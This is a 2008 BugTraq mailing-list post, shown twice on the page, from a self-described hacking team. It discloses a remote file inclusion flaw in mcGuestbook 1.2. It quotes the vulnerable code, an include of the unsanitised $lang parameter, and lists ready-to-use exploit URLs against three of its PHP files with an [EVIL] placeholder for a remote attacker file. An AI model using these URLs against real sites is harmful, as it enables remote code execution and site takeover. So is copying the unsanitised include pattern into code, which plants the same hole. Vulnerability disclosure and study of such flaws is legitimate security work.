BugTraq
Back to list
|
Post reply
mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
Jun 25 2008 05:14PM
Ghost hacker (ghost-r00t hotmail com)
hi
######################################################################
mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed] |/ /\ \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";
[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends ..
######################################################################
Real Hack Team ( R-H ) ..
######################################################################
see y0u ..
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
hi
######################################################################
mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed] |/ /\ \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";
[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends ..
######################################################################
Real Hack Team ( R-H ) ..
######################################################################
see y0u ..
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]